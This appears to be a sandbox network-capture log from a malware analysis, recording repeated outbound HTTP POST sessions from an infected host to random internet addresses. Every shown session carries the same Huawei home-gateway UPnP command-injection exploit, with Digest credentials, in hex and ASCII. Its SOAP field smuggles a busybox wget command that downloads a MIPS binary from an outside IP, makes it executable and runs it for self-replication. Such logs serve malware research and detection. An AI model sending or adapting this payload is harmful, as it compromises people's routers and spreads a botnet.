                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1788192.168.2.154411841.90.134.25237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.950753927 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1789192.168.2.1541214157.87.151.16137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.950773001 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1790192.168.2.155049682.178.174.12237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.955704927 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1791192.168.2.155305241.182.11.6237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.955719948 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1792192.168.2.1545054157.191.128.25437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.955739021 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1793192.168.2.1553596157.174.182.1137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.955799103 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1794192.168.2.1560464212.169.13.5437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.955838919 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1795192.168.2.154860641.157.61.2337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.955856085 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1796192.168.2.154542841.138.240.10737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.955862999 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1797192.168.2.1539280197.65.221.17237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.955910921 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 